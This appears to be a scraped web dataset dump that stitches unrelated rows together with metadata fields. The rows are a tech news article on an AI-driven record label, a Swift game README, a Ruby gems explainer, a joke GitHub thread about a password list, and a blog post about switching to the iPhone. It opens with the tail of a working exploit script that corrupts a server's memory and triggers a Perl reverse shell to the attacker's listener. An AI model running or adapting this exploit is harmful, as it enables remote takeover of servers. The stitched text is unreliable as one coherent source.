bc = listen(lport)
conn = remote(raddr, options.remoteport)
revshell = 'use Socket;$i="'
revshell += lip
revshell += '";$p='
revshell += str(lport)
revshell += ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if('
revshell += 'connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");'
revshell += 'open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
cmd = "-eeval{" + revshell + "}"
cmd += "\x00"
bin = '/usr/bin/perl'
conn.readuntil(')')
payload = ""
payload += p64(0xB16B00B54DADD135)
payload += bin
payload += '\x00' * (16 - len(bin))
# .bss base: 0x633940
payload += p64(0) # Clean beginning
payload += p64(0x62f5d8) # &send@.got
payload += p64(0x63af68) # execl argv[0]
payload += p64(0x63afa0) # execl argv[1]
payload += p64(0x0)
payload += cmd
payload += randoms(840 - len(cmd))
payload += p64(0x63b2f0) # sig_fin() memcpy() source (for .got overwrite)
got = ""
got += p64(0x406d40) # overwriting send() w/ &execl@plt
got += p64(0x400534) * 29 # ret
got += p64(0x41393e) # overwriting time() w/ &TCP_SEND()
got += p64(0x400534) * 3 # ret
payload += got
payload += randoms(1792)
payload += p64(0x63af70) # filename
payload += randoms(356)
payload += p64(0x63af68) # &ptr to binary to launch
payload += randoms(4436)
payload += p64(0x6339F8) # -> FILE *struct (to fake struct)
payload += randoms(520)
payload += p64(0x63af78) # @ of (rem_file+24) (ARGV0)
payload += randoms(248)
payload += p64(0x63afa0) # ptr to shell cmd string (ARGV2)
payload += randoms(30360)
payload += p64(0x63af88) # sig_fin() memcpy dst
payload += randoms(8696)
# conn.sendline('USER LEXFO')
# conn.readuntil('please?')
# Overwrite `.bss`
conn.sendline(randoms(5) + payload) # WARNING: sendline() adds an extra '\n'
log.success('Filled lit_parm->buf with good values.')
conn.readuntil(')')
# conn.clean()
# Triggering SIGSEGV (handler!) for arbitrary write primitive
log.info(
'Making subprocess crash to obtain sig_fin() poison .bss and preempt normal flow.'
)
conn.send('ALLO 1')
bc.wait_for_connection()
conn.clean()
conn.close()
time.sleep(1)
log.success('Got shell! Enj0y')
bc.interactive()
bc.close()
``` | true | true | true | null | 2024-10-12 00:00:00 | 2020-03-24 00:00:00 | null | null | null | null | null | null |
2,463,177 | http://www.telegraph.co.uk/science/8457193/Happiness-is-U-shaped-...-which-explains-why-the-middle-aged-are-grumpy.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
22,266,838 | https://techcrunch.com/2020/02/06/snafu-records-is-a-record-label-using-algorithms-to-find-the-next-big-artist/ | Snafu Records is a music label using algorithms to find its next big artist | TechCrunch | Anthony Ha | Snafu Records is bringing a new approach to finding musical talent — founder and CEO Ankit Desai described the Los Angeles-headquartered startup as “the first full-service, AI-enabled record label.”
It’s a world that Desai knows well, having spent the past five years working on digital and streaming strategy at Capitol Records and Universal Music Group. He argued that there’s still a vast pool of musical talent that the record labels are ill-equipped to tap into.
“If there’s some girl in Indonesia whose music the world is dying to hear, they’re never going to get the chance,” he said. “The bridge to connect her to the world doesn’t exist today. The music business is entrenched in a very old way of working, finding artists through word-of-mouth.”
There are other companies like Chartmetric creating software to help the labels scout artists, but Desai said, “I used to be the one buying the service. What always ended up happening was that we were trying to put 21st century technology into a 20th century machine.”
The machine, in other words, is the record label itself. So he decided to create a label of his own — Snafu Records, which is officially launching today.
The startup is also announcing that it has raised $2.9 million in seed funding led by TrueSight Ventures, with participation from Day One Ventures, ABBA’s Agnetha Fältskog, Spotify’s John Bonten, William Morris’ Samanta Hegedus Stewart, Soundboks founder Jesper Theil Thomsen, Headstart.io founder Nicholas Shekerdemian and others.
The Snafu approach, Desai said, uses technology “to essentially turn everyone listening to music into a talent scout on our behalf.”
The company’s algorithms are supposedly looking at around 150,000 tracks from unsigned artists each week on services like YouTube, Instagram and SoundCloud, and evaluating them based on listener engagement, listener sentiment and the music itself — Desai said the sweet spot is to be 70 or 75% similar to the songs on Spotify’s top 200 list, so that the music sounds like what’s already popular, while also doing just enough to “break the mold.”
This analysis is then translated into a score, which Snafu uses to go “from this firehose of music, distill it down to 15 or 20 per week, and then the human [team] gets involved.”
The goal is to sign musicians as Snafu artists, who then get access the company’s industry expertise (including advice from the label’s head of creative Carl Falk, who’s written songs for Madonna, One Direction and Nicki Minaj) and marketing support in exchange for a share of streaming revenue. Desai added that Snafu will share more of the revenue with artists and lock them in for shorter periods of time than a standard record contract.
Asked whether streaming (as opposed to touring or merchandising) will provide enough money for Snafu to build a big business, Desai said, “Economics-wise, streaming sometimes does get a bad rap sometimes. It’s a bit misunderstood — there’s still just as many artists making really, really good numbers through streaming, it’s just a different kind of artist.”
And while Snafu is only officially launching today, it has already signed 16 artists, including the Little Rock-based duo Joan and the jazz musician Mishcatt, whose song “Fade Away” has been streamed 5 million times in the five weeks since it was released.
“There’s a major opportunity for Ankit and the Snafu team to build a new innovative and enduring music label at the intersection of technology and deep industry expertise,” said Hampus Monthan Nordenskjöld, founding partner at TrueSight Ventures, in a statement. “The music industry is going through a tectonic shift and we’re extremely excited to work with Snafu as they redefine what it means to be a music label in the 21st century.”
Spotify is buying The Ringer to boost its sports podcast content | true | true | true | Snafu Records is bringing a new approach to finding musical talent — founder and CEO Ankit Desai described the Los Angeles-headquartered startup as "the | 2024-10-12 00:00:00 | 2020-02-06 00:00:00 | article | techcrunch.com | TechCrunch | null | null |
|
31,619,784 | https://github.com/jkirsteins/Wordlike/tree/ipad | GitHub - jkirsteins/Wordlike at ipad | Jkirsteins | A game written in SwiftUI using Swift Playgrounds 4.
The objective is to guess a word in 6 tries. A new round starts every day.
Available languages:
- English
- Latvian
- French
- Install Swift Playgrounds 4
- Clone this repository on your iPad directly into the Swift Playgrounds 4 storage
Then open Playgrounds, and the application should be available.
- English/British translations taken from <git@github.com:hyperreality/American-British-English-Translator.git>
- Latvian word list preparation relied on word analysis from https://github.com/PeterisP/LVTagger.git | true | true | true | A word guessing game written in SwiftUI in Playgrounds - GitHub - jkirsteins/Wordlike at ipad | 2024-10-12 00:00:00 | 2022-02-20 00:00:00 | https://opengraph.githubassets.com/44b89493b55d498df9b927f15a0fb4d5c2c0320a0d64beccc22ce60bfc8d0c85/jkirsteins/Wordlike | object | github.com | GitHub | null | null |
21,218,309 | https://deepmind.com/blog/article/Causal_Bayesian_Networks | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
8,388,956 | http://www.justinweiss.com/blog/2014/09/29/how-do-gems-work/ | How do gems work? | Justin Weiss | Most of the time, gems in Ruby Just Work. But there’s a big problem with Ruby magic: when things go wrong, it’s hard to find out why.
You won’t often run into problems with your gems. But when you do, Google is surprisingly unhelpful. The error messages are generic, so they could have one of many different causes. And if you don’t understand how gems actually work with Ruby, you’re going to have a tough time debugging these problems on your own.
Gems might seem magical. But with a little investigation, they’re pretty easy to understand.
What does gem install do?
A Ruby gem is just some code zipped up with a little extra data. You can see the code inside a gem with gem unpack.
gem install, in its simplest form, does something kind of like this. It grabs the gem and puts its files into a special directory on your system. You can see where gem install will install your gems if you run gem environment (look for the INSTALLATION DIRECTORY: line).
All of your installed gem code will be there, under the gems directory.
These paths vary from system to system, and they also depend on how you installed Ruby (rvm is different from Homebrew, which is different from rbenv, and so on). So gem environment will be helpful when you want to know where your gems’ code lives.
How does gem code get required?
To help you use the code inside of your gems, RubyGems overrides Ruby's require method. (It does this in core_ext/kernel_require.rb, and the comment at the top of that method makes the intent pretty clear.)
For example, say you wanted to load active_support. RubyGems first tries to require it using Ruby's original require method, which fails with a LoadError because the gem's code isn't on the load path yet.
Then, it activates the gem, which adds the code inside the gem to Ruby's load path (the directories you can require files from).
Now that active_support is on the load path, you can require the files in the gem just like any other piece of Ruby code. You can even use the original version of require, the one that was overwritten by RubyGems.
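A minimal irb-style sketch of this flow (assuming the activesupport gem is installed) might look like:
```
require "rubygems"

before = $LOAD_PATH.size
gem "activesupport"            # activate the gem: its lib/ dir joins $LOAD_PATH
puts $LOAD_PATH.size - before  # => 1 (or more, if dependencies are activated too)

require "active_support"       # now resolves like any other file on the path
```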
Cool!
A little knowledge goes a long way
RubyGems might seem complicated. But at its most basic level, it’s just managing Ruby’s load path for you. That’s not to say it’s all easy. I didn’t cover how RubyGems manages version conflicts between gems, gem binaries (like rails and rake), C extensions, and lots of other stuff.
But knowing RubyGems even at this surface level will help out a lot. With a little code reading and playing in irb, you’ll be able to dive into the source of your gems. You can understand where your gems live, so you can make sure that RubyGems knows about them. And once you know how gems are loaded, you can dig into some crazy-looking loading problems.
If you’d like to learn more about how Rails and Bundler handle gems, check out this article: How does Rails handle gems?.
While you wait, I'd love to <a href="https://mastodon.justinweiss.com/@justin">meet you on Mastodon</a>. You can learn a little bit more about Ruby each day -- I share the best Ruby and Rails articles I read. And it's great for short conversations and answering questions about software development. | true | true | true | null | 2024-10-12 00:00:00 | 2014-05-08 00:00:00 | website | justinweiss.com | Justin Weiss | null | null |
|
5,575,738 | https://www.fbpuewue.com/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
10,556,332 | https://myelin.io/how-to-minimize-procrastination | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,009,459 | https://github.com/danielmiessler/SecLists/pull/155 | Remove my password from lists so hackers won't be able to hack me by assafnativ · Pull Request #155 · danielmiessler/SecLists | Danielmiessler | -
# Remove my password from lists so hackers won't be able to hack me #155
## Conversation
**mitcom** reviewed
@@ -344,7 +344,6 @@ blue
liverpool
theman
bandit
-dolphins
@assafnativ please remember to update the filename. `10_million_password_list_top_1000.txt`
is not accurate right now, actually there are only 999 passwords
I think it should be renamed to `10_million_password_list_top_1000_except_dolphins.txt`
Greetings from dev null)0
Golden
Also any sites tested against the revised list should include some kind of logo to confirm that Dolphin is now allowed as a safe password. Might I suggest: http://savedolphins.eii.org/files/dsf/Dolphin_Safe.png
@liuzhiyuan1993 Oh, thanks ଲଇଉକ
There is an idiom in China, "此地無銀三百兩", which means giving away your secret yourself.
For security, you had better close the issue and fully delete it if possible.
To add on to the translation of the idiom, that phrase literally means writing a sign that says "I did NOT bury 300 grand in this spot"
Might I suggest: http://savedolphins.eii.org/files/dsf/Dolphin_Safe.png
I thinks they can safely merge it. The issue is the dolphin-proof now. 😄
The dolphins have communicated to us members of the Fourth International Posadist that they sign off on this request, as exposing them before their plan reaches completion could jeopardize the workers of the world. 🐋
This is a security hole. This pull request should be accepted as soon as possible. |
I'm also affected by this, please merge ASAP |
@assafnativ @rooterkyberian could you provide any testing data like service addresses and logins so we could check and test to estimate the real impact of this change? |
ROTFLMAO! |
What the.....i don’t think this will solve the issue
…On Thu, 21 Dec 2017 at 19:33, Krzysztof Staniorowski < ***@***.***> wrote:
ROTFLMAO!
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ADo_cTu0FfmnSQSxs34YcAbHMKk11h4vks5tClAygaJpZM4RJt0h>
.
|
@mitcom you mean, like the publicly available email address and blog address on his github page? |
@assafnativ They see me trollin, they hatin... |
4 random words are really easier than the gibberish? |
**dmytrokyrychuk** approved these changes
Looks good 👍
@KyrychukD wtf |
Can you please add my password To this list so I can test it against insecure services.. |
If anybody here is affected too I can suggest temporally change the password to one from https://mostsecure.pw/ |
Is dolphin1 on the list. ;) That's secure as it has a 1 |
Dolphin1! |
Ah good idea, hackers will never try that.. |
Same here.
|
Is my password hunter2 safe |
@dsuurlant I just see ******* |
is my password thisissparta safe???????? |
Absolutely, if changed! |
This is gold.
…Sent from my iPhone
On Dec 21, 2017, at 10:39 AM, Kishan Kumar ***@***.***> wrote:
is my password thisissparta safe????????
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub, or mute the thread.
|
Change it to dolphins, dolphins is safe now
21.12.2017 16:42 "Thaddée Tyl" <notifications@github.com> wrote:
… is my password thisissparta safe????????
Absolutely, if changed!
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/ACgiM34NXJyW-4C4DTitmf0OrwdXCd9Mks5tCnxqgaJpZM4RJt0h>
.
|
nice, my 122112 password still alive... |
At least I know Alligator1 will never be guessed. |
**nebril** approved these changes
Can confirm, is safe.
@assafnativ, you had the same password as mine? |
@0xmohit not anymore, I've just change yours |
Hahahhahaha pure genius |
If there are so many approvals, why isn't this merged yet? |
**PatrickJS** approved these changes
I hoped that this pull request would die at some point, but there's still something going on(even after two(!) months)... |
**Ekultek** approved these changes
@jens1o of course it is, it was unexpected and pretty funny. Even with all these approved, there is of course no merge, even though @assafnativ probably wants a merge. |
Thread muted. (didn't know it was an option till now) |
|
Spam
… On Feb 27, 2018, at 3:56 PM, César Del Solar ***@***.***> wrote:
is annoyed about all the comment spam
generates another piece of spam complaining about the spam
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub, or mute the thread.
|
S P A M |
Jezz ! For technologists we are not very good at this internet thing, are we ? The correct way to use a thread like this, is to participate to it and then mute it. This let the early participants, who eventually get tired of subsequent updates, not to be spammed [1], while allowing the genuine new people discovering this to be a part of it and to experience it with the same amusement as we all, old timers, did. Easy. [1] I personally don't feel that, I will never mute this as I love it! And as far as my inbox is concerned I discovered my email client's delete button a long time ago, but I understand that's not the case of everybody. |
I've been watching this since the first week and commenting on it since, I didn't mute it because it is still a great issue. If you really care that much, you can just read this to get rid of the notifications since you clearly do not know how to. |
👍 Although removal of this password would make you, and many marine biologists, more secure, we're going to have to decline at this time. : ) Best thread ever. |
It finally died! Good Job everyone! |
That was fun :) |
My password is |
* Performance: read the response dump line by line instead of loading the whole thing in memory The response from the service will grow over time. There is no way to get passwords [unpwned](danielmiessler/SecLists#155), so we can safely assume the list will keep growing, adding more an more new hashes. One day it will grow large enough to start taking down servers, when users "DDoS" applications with known "big" pwned password hash prefixes. This PR switches from "load everything to memory and find our hash" to "fetch data in chunks, and process line by line". * Remove regular expressions usage in favour of start_with? In Ruby `start_with?` is heavily optimized compared to regular expressions (more than 2 times faster). This PR replaces regular expressions with `start_with?` ``` 13.103359 0.734251 13.837610 ( 14.620959) 13.238428 0.742140 13.980568 ( 14.506166) 12.836573 0.729563 13.566136 ( 14.191792) 12.408245 0.642944 13.051189 ( 13.333299) ```
Do you know how does Git work? |
Oh man, this was just hilarious to scroll through. Especially since I was scrolling EDIT: But still, what if someone uses their ******** in the middle of a sentence? |
|
stop making new notifications, this page takes ages to load lol |
Thanks friend ... I will be glad to know you too well Mr.. Please can
you contact Me on what's app or any other social platform.. Am a noob
.. And I will be merry to gain from you...
…On Wed, Sep 5, 2018, 08:30 Jens Hausdorf ***@***.***> wrote:
stop making new notifications, this pages takes ages to load lol
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AhMBZWnRolxVID49T8yy6eDlC2ZEe4ijks5uX32zgaJpZM4RJt0h>
.
|
Thanks for notify me also
…On Wed, Sep 5, 2018, 08:30 Jens Hausdorf ***@***.***> wrote:
stop making new notifications, this pages takes ages to load lol
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AhMBZWnRolxVID49T8yy6eDlC2ZEe4ijks5uX32zgaJpZM4RJt0h>
.
|
Thank you, I almost forgot about this. |
pls bobs
…On Wed, Sep 5, 2018 at 6:12 AM Flowy ***@***.***> wrote:
Thank you, I almost forgot about this.
—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
<#155 (comment)>,
or mute the thread
<https://github.com/notifications/unsubscribe-auth/AAjuZuz6PpkXqS-dmKObe_I-vNB7to1gks5uX6OUgaJpZM4RJt0h>
.
|
I heard about magic button called "unsubscribe". |
**locked as resolved** and limited conversation to collaborators
No description provided. | true | true | true | null | 2024-10-12 00:00:00 | 2017-12-21 00:00:00 | https://opengraph.githubassets.com/36749899e839b476613b7f2a539102b7fb8af6502e726358019505ff509068cd/danielmiessler/SecLists/pull/155 | object | github.com | GitHub | null | null |
10,084,754 | http://casabona.org/2015/08/2-months-with-an-iphone/ | 2 Months with an iPhone | Casabona | # 2 Months with an iPhone
I wrote perhaps my most popular blog post ever just over 2 months ago. I talked about how I bought, used, and subsequently didn’t like the iPhone 6. I would be sticking with Android…or so I thought. Shortly after that post got popular, I was compelled to take another look at iOS.
There were 2 factors in my first trial with the iPhone that stacked the odds against me ever liking the device. I wasn’t using it as my only full time device, and I didn’t use all the features.
The first factor made my user experience with the iPhone more like this: “Ugh. I don’t like this; I’m just going to do it on my Android phone.” That means I never used the iPhone enough to not have a frustrating (read: *different* from Android) experience. The second factor was the real kicker. I was excluding the features that make using iOS great. I didn’t turn on iMessage. I wasn’t using Passbook or Apple Pay. Handoff was something that was hands-off for me (pun totally intended).
## Making the Switch
After 2 months fully immersed iPhone usage, I’m confident that this will be my primary device. At least for the foreseeable future. This means I have a lot of words I need to eat.
I’ve been an Android user and a big voice for the Android Army since the first devices were available. I will still have Android devices too; I need them for testing. But for every day use, I will be making the switch to the iPhone. Here’s why.
### Incredible Battery Life
This is by far the best feature. The battery life is better than any Android device I've ever used. I'm never worried about charging it during the day. I don't have to turn services off or download some God-forsaken app. I've gone 36 hours without charging it and still had plenty of battery life left.
Recently I was in NYC, unplugged the phone at 7:30am and used it all day, until about 2am. I made calls, got walking directions, checked the time, read, played games, and more. At 2am I still had 46% left. On the subway ride, I lost 3% battery compared to the 20% my friend lost on his Moto X.
### Really Nice Photos
I never put an emphasis on taking good photos on my phone. I’ve always used it for photos, but it wasn’t always a priority for me. Then I started doing a lot more stuff where I wanted to take photos. I was traveling, hanging out with my lady, exploring. I’m not a good photographer, so I never have my DSLR with me. I rely on my phone.
Whatever iOS does in software to make photos look good is magic. For a point-and-shoot, it’s fantastic. The photos are clear and crisp and usually done on the first try. That’s the kind of use I like to see.
### Accessories
It’s nice to have a device where I know I will be able to get great accessories. With the OnePlus One, I would walk into stores and people didn’t even know what I was talking about. They definitely didn’t carry accessories for it. With the iPhone, that’s not a problem.
There are countless cases, stands, add-ons, and more that work well with the iPhone. A few of my favorites are:
- Twelve South HiRise
- Star Wars bumper case I got from Disney World
- TuneBand for iPhone
With the bumper, it’s nice having a case that barely adds any bulk. The reason I never use one with my Android devices is that exact reason. Most cases take away from the form factor, and that’s frustrating to me.
## The iOS Ecosystem
Aside from those 3 big reasons, iOS has a lot of convenient, well working features built-in to it.
While trying to explain what I liked about using the phone to a friend (about 6 weeks in), I worded it like this:
There are a lot of small, indescribable interactions that make using the iPhone great.
It’s not something that I’d be able to verbalize to someone when trying to convince them to switch. They’d have to actually use the device to see what I mean.
I don’t exactly know what it is, but certain interactions just *feel* right. I can’t put my finger on it (this pun was not intended). It’s not something I could use in an argument with “Year Ago, Android-only Joe.”
Then there are the things I can explain.
### iMessage and Handoff
Since I use a Mac, having these features turned on is absolutely fantastic. I can text and call from my phone (or iPad). If I’m using Chrome, Safari, or other apps that support Handoff, I can switch seamlessly to my computer.
And yes, I know. You can get MightyText. You can do the same thing in Chrome on Android. Something about using Hangouts. *I know*. I use Android. I used it exclusively for 6 years and have thoroughly explored this space. You might even know about MightyText because of me. I'm telling you, it's better on iOS. It's more integrated. I don't have to download a 3rd party app. I don't have to fight or tab or click. As much as it kills me to say this, it **just works**. It's so convenient and it works really, really well.
### Passbook, Apple Pay, and Touch ID
Passbook, where have you been all my life? When I had a University-issued iPhone 4 and Passbook was brand new, it was terrible. Nothing worked with it. What a difference a couple of years make! It might be my favorite bundled app.
I add gift cards, plane tickets, concert tickets, and more, and Passbook keeps them all in one place for me. If I’m close to the airport, or it’s almost time for the concert to start, Passbook knows. It puts that ticket right on my lock screen; my ticket is accessible with one swipe. I’m gushing, but it’s much deserved. It’s an incredible feature.
And Apple Pay. Man; when it was first announced, I snobbishly said Google was there first with Google Wallet. And I'm right, of course. It's a sin that it took iOS this long to get NFC support, and a bigger sin that right now, only Apple Pay works with it. That said, let me tell you how I have to use Google Wallet:
**Open App -> Put in PIN -> Find Card -> Open Card -> Hold Phone to Reader**
Here’s how Apple Pay Works:
**Hold Phone to reader with thumb on Touch ID**
That’s it. I don’t have to open any app. I just have to hold my phone to a reader. This is the way it should be.
And Touch ID. I misjudged that. Now I'm of the opinion that if an app I have to log in to doesn't support Touch ID, the app isn't worth having. It works well. AND I figured out that I can add more than one fingerprint to it.
### Getting Updates when they come out
No more waiting *forever* to get OS updates. The day iOS 9 drops, I will have it on my phone. Do you know how long it took me to get Lollipop? I had to buy a new phone. Then I had to nearly brick that phone during an upgrade.
## It’s not Perfect
There are still a few things I miss about Android that aren’t on iOS.
### Customization
I miss tinkering a bit, but not as much as I thought. There's a lot to be said about customizing your experience beyond the defaults. I like that I'm not crushing time by tinkering, but I loved widgets. The Notification bar and extended functionality are nice, but not "customizable widgets" nice.
As a web developer, I can appreciate why Apple did this. As a user, I kind of feel it’s my phone, and I should be able to do what I want with it. However, they spent a ton of time making their design perfect, and they don’t want people mucking it up. It’s a design decision that I understand, at the very least.
### Sharing Needs Work
Android is far better at this. Apple's sharing is coming along, but it's not nearly as integrated with other apps as Android is. I didn't realize just how much I used that function until I started using iOS. Sharing can be downright frustrating at times. I'm told that may get better with iOS 9. But right now, sharing a photo from Camera to Instagram or anything to Dropbox takes too long.
### The Back Button
Yes, I know I said this last time. But after 2+ months, it’s still something I miss. I can double-tap the home button to bring up a list of apps, but it’s not the same as a dedicated back button. I feel like it makes bouncing around apps a lot easier. Maybe now that iOS supports multitasking, some solution will emerge. Until then, I’m excited for my Halo Back Screen Protector to come.
### Clearing Apps
This is a bit of a pain in the butt, especially if I have a lot open. I miss the “Clear All” button that comes on Android devices. A small feature, but a deeply appreciated and time-saving one.
## Some Final Thoughts
This has been a strange experience for me. I’ve been such an outspoken proponent of Android. It was more like anti-iPhone. That means making the switch has been one of begrudging acceptance. At first, I didn’t like that I liked it.
But as I use the iPhone more and see how well it actually works, it's clear that Android is great for some things. But it needs to mature in other aspects. And I think Google knows that too. The change in treatment of Android over the last few years has been noticeable. It's like Google said, *"GUYS. We need to fix this mess."*
But still. As I write this post using iA Writer on my iPad, I know I will be able to proof it on my iPhone while I wait at Baggage Claim. Then I will hit publish from my Mac, all without having to push a sync or refresh button. And that’s some powerful stuff.
I had the iPhone 6 Plus, a great one, and I liked the fact that since not much runs in the background like Android does, it does not need the 3GB of RAM my Note 4 has now. The Note 4 has problems with slowing down for a while, even when not doing stuff that's too taxing.
Only sold my iPhone to put towards a used car. Too much bloat on Samsung phones, mine's showing it needs 7.3GB just for the OS. It has an option to uninstall built-in apps, but that just removes the latest update then disables it, wtf.
Android is more like Windows, I feel; it's not as custom made for its hardware as Apple makes iOS. You get a dual core CPU and 1GB of RAM and it's just as good as many "high end" Android phones that, like the Note 4, are 2.7GHz quad core with 3GB of RAM. My son has an LG G3 and that gets hot just playing videos etc.
Just to touch on your point about clearing apps.
You really don’t have to.
Memory management on iOS is so much better than Android. I have an OPO as well as a Galaxy S6 and yes, you will run into problems if you don’t clear out apps from running. But on the iPhone… just let it go. They aren’t impacting your memory or performance.
No need to “clear” apps in iOS. Just because your recent apps show at the bottom when you double tap the home button doesn’t mean they’re running or taking any resources. Think of it more as a “recently used” area. The most recent may still be running to facilitate faster app switching, but as your iPhone needs more resources, it’ll quit the oldest app and take what it needs.
As BernDog said, you don’t need to clear apps. Just let them open. They don’t waste resources and they will reopen faster.
As for the “back button”, wait for IOS 9. You can even try it now if you subscribe to the public beta.
If only Apple would build in wireless charging. I absolutely love not plugging my S5 into anything. Just set it on the charging pad.
Re:dedicated back button.
In iOS 9 (in the beta) there is an option to go back to the previous app (button/text at the top of the screen).
Greetings,
Thanks for an excellent article. I would like to make a note on one thing you wrote:
“It’s a sin that it took iOS this long to get NFC support,”
There is a reason for this. As I write in a post of my own (below), Apple has a certain M.O. for how it deals with technology. In particular, it does not release new technology until it thinks:
1- the tech itself is mature enough, and
2- it is ready with the proper software experience. (Yes, there have been some notable snafus with this.)
So let’s examine the NFC/ApplePay issue. Simply put, inclusion of an NFC system was useless if not supported by software. Software system was not available any earlier.
The key here is the importance of security for a payment system. This is not an area that allows for any errors at all. Compromised data would be costly for all involved. Additionally, the ApplePay system required the buy-in of card companies that were not going to do so unless convinced of security.
So – Apple first need to have a secure TouchID. This was not possible until the tech was available – developed and tested. Then Apple needed to test the system. What many people do not realize is that they were doing this in real-world application for a year prior to release of ApplePay.
When Apple released TouchID with the 5s, it included the ability to buy from iTunes and the App store with TouchID – essentially this was baby ApplePay.
And this is precisely Apple’s MO – test in a limited capacity before moving to more general application. They did the same with the original iPhone. Features such as cut/paste were not included, precisely because it presented security risks and greatly complicated the real-world debugging. The same with release on ATT only. The limited exposure gave them a more reliable system, and allowed them to refine the product in controlable environment.
Clearly Apple has the most secure pay system available. The only reason is that they took the time to develop it until they were convinced it was ready.
Best regards – JMM
Link: http://seekingalpha.com/article/2600885-how-apple-pay-reveals-apples-m-o
I’m a payments architect and have worked at many well known and global companies. I know Android and iOS quite well.
As far as payments go, there was not sufficient NFC reader support to make it worthwhile. Few vendors had them or wanted to buy them. This was a perfect time for Apple to introduce NFC because vendors are buying new readers for the new chip and pin cards, and most also do NFC.
Google Wallet is a joke. It has cost Google millions. It is not as secure at Apple Pay/Touch ID/iOS and Google decoupled Google Wallet from NFC in a desperate effort to try to get people to use it.
The demographics of Android users are not very exciting to retailers either. They don’t buy things.
I have had exactly the same experience as the writer. I use a S6 and have had the iPhone 6 Plus from release. I have public beta 3 of iOS 9 running on both my iPhone and iPad Air and it's a massive improvement, and free to install and totally stable. The back button issue you mentioned is addressed in iOS 9 to some extent. All in all I use my iPhone as my daily driver, with my S6 and Nexus 9 filling in the blanks, which by the way get fewer with each update of iOS.
Well my friend, I enjoyed reading your post, and I am writing to tell you: Fear not, for Phil Schiller himself has read it and has tweeted it, and that’s how I found it. Apple has read and heard all that you said, and I hope they take all the iOS improvements or shortcomings you mentioned into consideration in very near future iOS updates.
I personally have a feeling that iOS 10 is going to change everything all over again.
Clearing apps from multi-tasking is actually more of a battery killer than leaving them running. They’re suspended and held in memory, and having the phone re-open them each time uses more battery power, since the phone has to re-load the whole app rather than just un-suspend it. That’s what I’ve heard and read a few times when looking for ways to extend battery life.
iOS 9 brings more battery-saving software features, as well as a low power mode that really keeps the battery from draining for over 2 days on a single charge 🙂
And you didn’t even mention security from hacking eg. Stagefright:
https://en.m.wikipedia.org/wiki/Stagefright_(bug)
Where do you find compatible gift cards & (concert) tickets for Passbook??
Does anyone know which app & which stores have gift cards that’s compatible with Passbook please?
Thanks
There are priorities that any smartphone user looks at. Maybe the things that you listed as pros of Apple over Android really are pros. But the way Apple handles media files (photos, videos)... why do you always have to sync your device with iTunes to play a song, man?? Why can’t you download a video or song from any website and, without even thinking, play it! Come on! And the inability of an Apple device to share files using Bluetooth or WiFi Direct or NFC is a let-down. Why should Apple have its own charging cables? Why can’t it go with industry-standard micro USB ports? Where is the expandable memory? Give me a break..!
Congrats! While you’re waiting for HALO BACK — you can go back with a back-swiping gesture from the left edge of your screen. It works almost everywhere.
rajb2r,
1) You don’t need a PC with iTunes to manage your media. That was true for the iPod (and it was great) and early versions of iOS. There’s a dedicated Photos app for Mac, and it even works in a web browser on iCloud.com. You don’t have to do anything: photos sync automatically and are even deleted from the device if you don’t have enough space.
2) You are free to use any music player. You can download files in Safari and send them to your custom music player.
3) If you use Apple’s Music app, it doesn’t require iTunes to sync your music. You can download music from the iTunes Store or Apple Music right on the device.
4) You can download video from any website and open it with many third party video players, such as VLC.
5) You can share files wirelessly using AirDrop — it uses Bluetooth 4.0 for handshaking and Wi-Fi for high-speed transfers.
6) Apple’s Lightning cable is light years ahead of micro USB. It looks better, feels better, it’s better for nature and, most importantly, it is reversible – you can plug it in from both sides. It can also transfer audio when you’re using a dock.
7) There’s no expandable memory. Just get the right size for you. It’s a plus: you don’t have to manage two separate storages — device and card — and don’t have to decide where to put your data. It also makes the device slimmer and stronger.
If you really miss customization you can try jailbreaking. I’m a huge Apple “fanboy” yet I can’t think of an iPhone or iPad I’ve owned I haven’t jailbroken at some point. Also as for the back button you can use a gesture. For example when you’re in safari if you want to go back a page put your finger at the left edge of the screen and rapidly move it towards the right side, and this will take you back. I find this works in most apps like Settings, Music, Safari, etc.
Unless of course you mean going back to the previous app; iOS 9 solves that (very annoyingly). I run the beta and it puts a “back to last app” button right where my carrier name should be. It drives me insane, because I like to see my bars. I understand some people want this feature, but I do not. I wish Apple would give us the option to turn it off.
Great post.
You can swipe to the right in most apps instead of needing to tap the upper left hand button, and that will pop the current view controller. It’s not a back button like Android, but it’s convenient.
Honestly though, your other gripes can be fixed with a jailbreak. Here’s some examples:
1. You can download tweaks that add a “clear all apps” button.
2. You can customize your phone with multiple themes and apply them with Winterboard, as well as a plethora of existing visual tweaks.
3. You can assign gestures to do virtually anything with Activator. Want to compose and post to Twitter with a swipe on the status bar? Done. Want to disable some services when you reach 20% battery? You got it.
4. You can lock any app with Touch ID, as well as control center toggles.
5. Many multitasking replacements (such as having a 3×3 grid of app cards).
6. Specific tweaks to enhance many apps (Safari, Messages, Music, Youtube, etc….)
7. Watching videos in PiP mode while doing other tasks with VideoPane.
8. f.lux! It’s a godsend if you’ve ever used it on your Mac.
9. You can change control center toggles, as well as customize the entire CC and NC (add/remove sections, remove separator colors, etc…).
10. Access to the filesystem using any SFTP program or a file browser like iFile.
That’s a really well considered piece. Good writing. Good thinking.
Good post.
When I saw your first post saying you were avoiding iMessage, I thought maybe you weren’t a Mac user, but now I know. The whole Apple ecosystem works really well.
Mainly I use an iPhone, and I use Android as a second phone, mostly for testing.
